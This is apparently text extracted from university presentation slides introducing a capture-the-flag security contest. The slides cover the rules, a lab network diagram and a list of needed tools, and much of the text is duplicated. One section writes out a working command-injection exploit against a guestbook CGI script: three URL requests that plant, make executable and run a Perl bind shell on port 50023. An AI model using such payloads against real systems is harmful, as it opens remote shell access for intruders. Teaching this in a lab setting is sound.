CTFCTF

Mike GerschefskeMike Gerschefske

Justin Justin GrayGray

What is it?What is it?

Came from DefconCame from DefconUCSB sp0nsorz – won last years DefconUCSB sp0nsorz – won last years DefconTest Skills of understanding securityTest Skills of understanding securityWhat it’s not!What it’s not!

See who’s 1337 or l4am3r through script See who’s 1337 or l4am3r through script kiddie techniqueskiddie techniques

RulesRules

Don’t be LameDon’t be LameThis includes (D)DoS – Unfair bandwidth This includes (D)DoS – Unfair bandwidth

practicespracticesCircumventing the private network and using Circumventing the private network and using

public ip address (not cool)public ip address (not cool) Illegal stuff is not a good ideaIllegal stuff is not a good idea

E.g. don’t hack the power gridE.g. don’t hack the power grid

Everything else is legal!Everything else is legal!

At Defcon team reverse engineered score At Defcon team reverse engineered score system and generated tokens.system and generated tokens.People got upset, but was legalPeople got upset, but was legal

Can root boxes but not what’s being Can root boxes but not what’s being tested.tested.w00tw00t

Last years eventLast years event

Have to assume this year is similarHave to assume this year is similar We p0wn3d the easy partsWe p0wn3d the easy parts

SQL InjectionSQL Injection Example http://128.198.61.43/~estore/cgi-bin/login.php Example http://128.198.61.43/~estore/cgi-bin/login.php

Exploit unchecked user inputExploit unchecked user input Security through obscuritySecurity through obscurity

OMG – this really works!!!OMG – this really works!!! Perl examplePerl example

Test Network

Real Network

Image 10.10.1.2

10.10.1.3Vuln

10.10.1.4Team

Hub

Team Box10.10.1.1

Mon Box10.10.1.x

AttackBoxes

Console for Fixes

Image Test Box

VulnPatch Test

VulnAttack Box

UCCSBoxes

UCCSBoxes

Affectively created two directional nat.Affectively created two directional nat.Blocking IP addresses is futileBlocking IP addresses is futile

All traffic comes from SAME IPAll traffic comes from SAME IPForces Packet InspectionForces Packet Inspection

Network TopographyNetwork Topography

the examplethe example http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`ehttp://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`e

cho%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhcho%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)-en)->accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\>accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`

http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`chmod%20755%20final.pl`guestbook=`chmod%20755%20final.pl`

http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`final.pl` guestbook=`final.pl`

The basstard demoThe basstard demo

W00t W00t http://128.198.61.43http://128.198.61.43 SQL InjectionSQL Injection Unchecked code injectionUnchecked code injection

File upload!!!File upload!!!

Buffer overrunBuffer overrun Security through obscurity revisitedSecurity through obscurity revisited http://128.198.61.43/test/ccauthd/ccauthd.chttp://128.198.61.43/test/ccauthd/ccauthd.c

BackupsBackups

Network TopographyNetwork Topography

So you wanna be a h4x0rz?So you wanna be a h4x0rz?

Here’s what you need!Here’s what you need!vi – or any editorvi – or any editora browser – or anything to do httpa browser – or anything to do httpa compiler (depends on the situation)a compiler (depends on the situation)a debugger (optional)a debugger (optional)a clue!a clue!

Dumpster diving is coolDumpster diving is coolGetting information from the inside Getting information from the inside